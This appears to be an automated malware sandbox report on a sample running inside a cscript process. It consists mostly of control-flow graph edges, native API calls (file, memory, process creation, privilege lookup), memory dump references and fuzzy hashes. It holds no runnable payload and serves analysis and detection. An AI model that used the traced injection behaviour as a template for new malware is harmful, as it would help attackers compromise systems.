API calls 91566->91567 91568 301bbcb 91567->91568 91568->91544 91569->91535 91570->91523 91572 301af60 LdrLoadDll 91571->91572 91573 301a64c RtlAllocateHeap 91572->91573 91573->91560 91575 3014081 91574->91575 91576 3014089 91574->91576 91575->91468 91605 301435c 91576->91605 91701 301cf30 91576->91701 91578 30140dd 91579 301cf30 2 API calls 91578->91579 91582 30140e8 91579->91582 91580 3014136 91583 301cf30 2 API calls 91580->91583 91582->91580 91709 301cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 91582->91709 91710 301d060 91582->91710 91586 301414a 91583->91586 91585 30141a7 91587 301cf30 2 API calls 91585->91587 91586->91585 91589 301d060 3 API calls 91586->91589 91588 30141bd 91587->91588 91590 30141fa 91588->91590 91592 301d060 3 API calls 91588->91592 91589->91586 91591 301cf30 2 API calls 91590->91591 91593 3014205 91591->91593 91592->91588 91594 301d060 3 API calls 91593->91594 91599 301423f 91593->91599 91594->91593 91597 301cf90 2 API calls 91598 301433e 91597->91598 91600 301cf90 2 API calls 91598->91600 91706 301cf90 91599->91706 91601 3014348 91600->91601 91602 301cf90 2 API calls 91601->91602 91603 3014352 91602->91603 91604 301cf90 2 API calls 91603->91604 91604->91605 91605->91468 91607 30153a1 91606->91607 91608 3014a50 8 API calls 91607->91608 91610 30153b7 91608->91610 91609 301540a 91609->91472 91610->91609 91611 30153f2 91610->91611 91612 3015405 91610->91612 91613 301bdc0 2 API calls 91611->91613 91614 301bdc0 2 API calls 91612->91614 91615 30153f7 91613->91615 91614->91609 91615->91472 91716 301ac30 91616->91716 91618 301ad84 91619 301ac30 LdrLoadDll 91618->91619 91620 301ad8d 91619->91620 91621 301ac30 LdrLoadDll 91620->91621 91622 301ad96 91621->91622 91623 301ac30 LdrLoadDll 91622->91623 91624 301ad9f 91623->91624 91625 301ac30 LdrLoadDll 91624->91625 91626 301ada8 91625->91626 91627 301ac30 LdrLoadDll 91626->91627 91628 301adb1 91627->91628 91629 301ac30 LdrLoadDll 91628->91629 91630 301adbd 91629->91630 91631 301ac30 LdrLoadDll 
91630->91631 91632 301adc6 91631->91632 91633 301ac30 LdrLoadDll 91632->91633 91634 301adcf 91633->91634 91635 301ac30 LdrLoadDll 91634->91635 91636 301add8 91635->91636 91637 301ac30 LdrLoadDll 91636->91637 91638 301ade1 91637->91638 91639 301ac30 LdrLoadDll 91638->91639 91640 301adea 91639->91640 91641 301ac30 LdrLoadDll 91640->91641 91642 301adf6 91641->91642 91643 301ac30 LdrLoadDll 91642->91643 91644 301adff 91643->91644 91645 301ac30 LdrLoadDll 91644->91645 91646 301ae08 91645->91646 91647 301ac30 LdrLoadDll 91646->91647 91648 301ae11 91647->91648 91649 301ac30 LdrLoadDll 91648->91649 91650 301ae1a 91649->91650 91651 301ac30 LdrLoadDll 91650->91651 91652 301ae23 91651->91652 91653 301ac30 LdrLoadDll 91652->91653 91654 301ae2f 91653->91654 91655 301ac30 LdrLoadDll 91654->91655 91656 301ae38 91655->91656 91657 301ac30 LdrLoadDll 91656->91657 91658 301ae41 91657->91658 91659 301ac30 LdrLoadDll 91658->91659 91660 301ae4a 91659->91660 91661 301ac30 LdrLoadDll 91660->91661 91662 301ae53 91661->91662 91663 301ac30 LdrLoadDll 91662->91663 91664 301ae5c 91663->91664 91665 301ac30 LdrLoadDll 91664->91665 91666 301ae68 91665->91666 91667 301ac30 LdrLoadDll 91666->91667 91668 301ae71 91667->91668 91669 301ac30 LdrLoadDll 91668->91669 91670 301ae7a 91669->91670 91671 301ac30 LdrLoadDll 91670->91671 91672 301ae83 91671->91672 91673 301ac30 LdrLoadDll 91672->91673 91674 301ae8c 91673->91674 91675 301ac30 LdrLoadDll 91674->91675 91676 301ae95 91675->91676 91677 301ac30 LdrLoadDll 91676->91677 91678 301aea1 91677->91678 91679 301ac30 LdrLoadDll 91678->91679 91680 301aeaa 91679->91680 91681 301ac30 LdrLoadDll 91680->91681 91682 301aeb3 91681->91682 91683 301ac30 LdrLoadDll 91682->91683 91684 301aebc 91683->91684 91685 301ac30 LdrLoadDll 91684->91685 91686 301aec5 91685->91686 91687 301ac30 LdrLoadDll 91686->91687 91688 301aece 91687->91688 91689 301ac30 LdrLoadDll 91688->91689 91690 301aeda 91689->91690 91691 301ac30 LdrLoadDll 91690->91691 91692 301aee3 91691->91692 91693 
301ac30 LdrLoadDll 91692->91693 91694 301aeec 91693->91694 91694->91476 91696 301af60 LdrLoadDll 91695->91696 91697 3019edc 91696->91697 91722 51f2d10 LdrInitializeThunk 91697->91722 91698 3019ef3 91698->91478 91700->91473 91702 301cf40 91701->91702 91703 301cf46 91701->91703 91702->91578 91704 301bf90 2 API calls 91703->91704 91705 301cf6c 91704->91705 91705->91578 91707 3014334 91706->91707 91708 301bdc0 2 API calls 91706->91708 91707->91597 91708->91707 91709->91582 91711 301cfd0 91710->91711 91712 301d02d 91711->91712 91713 301bf90 2 API calls 91711->91713 91712->91582 91714 301d00a 91713->91714 91715 301bdc0 2 API calls 91714->91715 91715->91712 91717 301ac4b 91716->91717 91718 3014e50 LdrLoadDll 91717->91718 91719 301ac6b 91717->91719 91718->91719 91720 3014e50 LdrLoadDll 91719->91720 91721 301ad17 91719->91721 91720->91721 91721->91618 91721->91721 91722->91698 91724 51f2b3f LdrInitializeThunk 91723->91724 91725 51f2b31 91723->91725 91724->91482 91725->91482 91727 301a679 91726->91727 91728 301af60 LdrLoadDll 91727->91728 91729 301a68c RtlFreeHeap 91728->91729 91729->91485 91731 3007eb0 91730->91731 91732 3007eab 91730->91732 91733 301bd40 2 API calls 91731->91733 91732->91415 91736 3007ed5 91733->91736 91734 3007f38 91734->91415 91735 3019ec0 2 API calls 91735->91736 91736->91734 91736->91735 91737 3007f3e 91736->91737 91742 301bd40 2 API calls 91736->91742 91746 301a5c0 91736->91746 91738 3007f64 91737->91738 91740 301a5c0 2 API calls 91737->91740 91738->91415 91741 3007f55 91740->91741 91741->91415 91742->91736 91744 301a5c0 2 API calls 91743->91744 91745 300817e 91744->91745 91745->91372 91747 301af60 LdrLoadDll 91746->91747 91748 301a5dc 91747->91748 91751 51f2b90 LdrInitializeThunk 91748->91751 91749 301a5f3 91749->91736 91751->91749 91753 301b5c3 91752->91753 91754 300acf0 LdrLoadDll 91753->91754 91755 3009c4a 91754->91755 91755->91378 91757 300b063 91756->91757 91759 300b0e0 91757->91759 91771 3019c90 LdrLoadDll 91757->91771 91759->91385 91761 
[Control-flow graph edge data (node-id to node-id pairs) for the 0x03000000 memory dump, rendered interactively in the original report. API calls referenced by the graph nodes: LdrLoadDll, LdrInitializeThunk, LookupPrivilegeValueW, CreateProcessInternalW, SetErrorMode.]

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 320 301a360-301a3b1 call 301af60 NtCreateFile
APIs
• NtCreateFile.NTDLL(00000060,00000000,.z`,03014BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03014BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0301A3AD
Strings
Memory Dump Source
• Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID: .z`
• API String ID: 823142352-1441809116
• Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
• Instruction ID: 325361e6e155c984b75c79b4848f7fd10772c6424632a968ee23dd13866ae118
• Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
• Instruction Fuzzy Hash: 9CF0BDB2201208ABCB08CF88DC84EEB77ADAF8C754F158248FA0D97240C630E8118BA4
APIs
• NtReadFile.NTDLL(03014D72,5EB65239,FFFFFFFF,03014A31,?,?,03014D72,?,03014A31,FFFFFFFF,5EB65239,03014D72,?,00000000), ref: 0301A455
Memory Dump Source
• Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
• Instruction ID: 1f1c75b823f40b0971178c6cb79b5fd7e1a53f9f8edfef9c7ad51466d6da49fc
• Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
• Instruction Fuzzy Hash: AFF0A4B6200208ABCB14DF89DC80EEB77ADEF8C754F158248BA1D97241D630E8118BA0
APIs
• NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03002D11,00002000,00003000,00000004), ref: 0301A579
Memory Dump Source
• Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: f2ca0bd7ba1458da90e15b92c60de02830a22107da88ad82c7e4025ef20db92f
• Instruction ID: ba05b1ecbffb979f61707d931a557380dbd4d61f55dd5b44cbecdd11b0a8174d
• Opcode Fuzzy Hash: f2ca0bd7ba1458da90e15b92c60de02830a22107da88ad82c7e4025ef20db92f
• Instruction Fuzzy Hash: 40F01CB5214149ABCB15DF98D884CE777A9FF88224B15868DF9489B213C234D815CBA1
APIs
• NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03002D11,00002000,00003000,00000004), ref: 0301A579
Memory Dump Source
• Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
• Instruction ID: 208e4129196cbc44d51e3c9b65091fae6363395ed5a3935ca61cf9b23e6dc821
• Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
• Instruction Fuzzy Hash: DEF015B6200208ABCB14DF89CC80EEB77ADEF88654F118148FE0897241C630F810CBA0
APIs
• NtClose.NTDLL(03014D50,?,?,03014D50,00000000,FFFFFFFF), ref: 0301A4B5
Memory Dump Source
• Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: e327d813ded35b59d8ca00ef1b63904e5c9d6c1ed257d589112194f8ea339bdf
• Instruction ID: 79ccbb89a8adf19add4f3271325a2c2f18d9d8fa43911f744c90dd6876f7ef17
• Opcode Fuzzy Hash: e327d813ded35b59d8ca00ef1b63904e5c9d6c1ed257d589112194f8ea339bdf
• Instruction Fuzzy Hash: F3E0263A3012046FC710DFE4DC44EE737A8EF84310F144159F91D8B241C130E1118B90
APIs
• NtClose.NTDLL(03014D50,?,?,03014D50,00000000,FFFFFFFF), ref: 0301A4B5
Memory Dump Source
• Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
• Instruction ID: abb5067ec43e2e5d31a8daf0e5d201ec7007d050ea08802843e0b5720e19cfe2
• Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
• Instruction Fuzzy Hash: 72D012752013146BD710EBD8CC45ED7776CEF44660F154459BA1C5B241C530F51086E0
APIs
Memory Dump Source
• Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
• Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: f78821e62e52c5e0d5033c6064b8c9460a2b1acd9bec90dd186c13a0439dafd1
• Instruction ID: a446bbf77ec78dc9828ec7ef83c6e5bdc11368a54ca286a28c246a209564104c
• Opcode Fuzzy Hash: f78821e62e52c5e0d5033c6064b8c9460a2b1acd9bec90dd186c13a0439dafd1
• Instruction Fuzzy Hash: AC90023161650802D6006158465470710568BD0301FA1D815A041456CEC7E5895175A2
APIs
Memory Dump Source
• Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
• Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 64c0c96ebe973473632bc105d2ab80164c082938a34dd4aa631cfe3a854354c0
• Instruction ID: 5956181b040bb4af61ac9cdc1677c9e9c85a920ccbfbb4b826b5be238138afd9
• Opcode Fuzzy Hash: 64c0c96ebe973473632bc105d2ab80164c082938a34dd4aa631cfe3a854354c0
• Instruction Fuzzy Hash: 7490023121240813D61161584644707005A8BD0341FD1D816A041455CED6A68952B121
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: af9b0b75b7eb0252ff74cf66013ea97d11a70f30a499821760a46969d5f4b868
                                                                                                                                                                                                        • Instruction ID: 6e4ade05d59d07eb06b76a1a4bb7e63efddd38bc6ff47e0a499418639e062471
                                                                                                                                                                                                        • Opcode Fuzzy Hash: af9b0b75b7eb0252ff74cf66013ea97d11a70f30a499821760a46969d5f4b868
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B590027121240802D6407158454474700568BD0301F91D415A5054558FC6A98DD57665
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 4e5f4e488c7a1a9ebe23a1c17127a943fc71c15ebff3d502bf6cde29ec404e93
                                                                                                                                                                                                        • Instruction ID: 0426e7214dc20d2c6cd23ffcfa5c066fdf79dcc8e4a6bd7827ff27b909baa970
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e5f4e488c7a1a9ebe23a1c17127a943fc71c15ebff3d502bf6cde29ec404e93
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F90022922340402D6807158554860B00568BD1302FD1E819A000555CDC96588696321
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 959aec5db87ea0d5bbfcbb123449fee6560bc5adf49f885ebd0f4c05636a6244
                                                                                                                                                                                                        • Instruction ID: d5c83deb6242c55b5d0096eb41dd16585129ad8dac04ee384b2f1bacc75611d3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 959aec5db87ea0d5bbfcbb123449fee6560bc5adf49f885ebd0f4c05636a6244
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88900221253445525A45B158454450740579BE0341BD1D416A1404954DC5769856E621
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 51175cbe9efd9a2390c8cc2ba80c19593b006dc85700ef3946ae829eae261cb8
                                                                                                                                                                                                        • Instruction ID: 479aa358e56a38a3d4994c8a563eb14d7f0428cb5642d608e34fa57023a1002e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51175cbe9efd9a2390c8cc2ba80c19593b006dc85700ef3946ae829eae261cb8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0900221222C0442D70065684D54B0700568BD0303F91D519A0144558DC96588616521
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: e40fc886471b9f3519bee2f0e57011a705309ee4e7a7e4599b201aebd320095b
                                                                                                                                                                                                        • Instruction ID: c35134040c530769295df22de872f2f9e9b74d10115499e537e1df94586903ba
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e40fc886471b9f3519bee2f0e57011a705309ee4e7a7e4599b201aebd320095b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C190026135240842D60061584554B070056CBE1301F91D419E1054558EC669CC527126
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 5e3fafa9feb1e7dedd7421338962de7dffbabcb7d4af9b82b879c06128e420b2
                                                                                                                                                                                                        • Instruction ID: 4106ce261fbc887bf13ac10040aa52a4df7e416e17ab5011678e073856fe478c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e3fafa9feb1e7dedd7421338962de7dffbabcb7d4af9b82b879c06128e420b2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72900225222404030605A558074450700978BD5351791D425F1005554DD67188616121
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 1c29c2fb79d619c068c8bb0efad416fe1f24422a462eec112e9104aae60b4c42
                                                                                                                                                                                                        • Instruction ID: 890fbca28489361c1821d4df0a9834c3cb91bc7b096e884429bf7b5545cfa493
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c29c2fb79d619c068c8bb0efad416fe1f24422a462eec112e9104aae60b4c42
                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED90023121240C02D6807158454464B00568BD1301FD1D419A0015658ECA658A5977A1
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: d4d130620a9271a3773482d5693e1cc6343ea50296ee738ab74fcf34f1686547
                                                                                                                                                                                                        • Instruction ID: 7e14407376b051c80480a59c85c01f809c7c9ad62aa244b31535da5b3e8a6156
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4d130620a9271a3773482d5693e1cc6343ea50296ee738ab74fcf34f1686547
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A390023121644C42D64071584544A4700668BD0305F91D415A0054698ED6758D55B661
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 611b30ba83f6473ba61b6ca4cc3cecfcf08985beaf578ab744a4573a1ce1d987
                                                                                                                                                                                                        • Instruction ID: 9b034a9229d9dd2fafa7821a349f366ea2baca817c83869bb6c303d6b4bf15ea
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 611b30ba83f6473ba61b6ca4cc3cecfcf08985beaf578ab744a4573a1ce1d987
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E390023121248C02D6106158854474B00568BD0301F95D815A441465CEC6E588917121
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: ba57bf811ced8293adb7a79a1ccb37b9ce2dcaa3a32f60af733e3790610142b3
                                                                                                                                                                                                        • Instruction ID: 4ea3a94659b8187a61f688321b2830dd7ce90c90b0f0bd32a9ce5ffd2ac2c790
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba57bf811ced8293adb7a79a1ccb37b9ce2dcaa3a32f60af733e3790610142b3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6590023121240C42D60061584544B4700568BE0301F91D41AA0114658EC665C8517521
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: df992cfadc584349908673f902747b7d8661e3d6e20d8fec9d23dd2fca7045ce
                                                                                                                                                                                                        • Instruction ID: 77a453334cf7b15a2a801828cb78a5b103e850c0f6774596466c3bb1c118fa84
                                                                                                                                                                                                        • Opcode Fuzzy Hash: df992cfadc584349908673f902747b7d8661e3d6e20d8fec9d23dd2fca7045ce
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C890023121240802D6006598554864700568BE0301F91E415A5014559FC6B588917131
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 186d2f74a69ae1b35147a7680f19e298f00e7147c6af35576018a264186e93c1
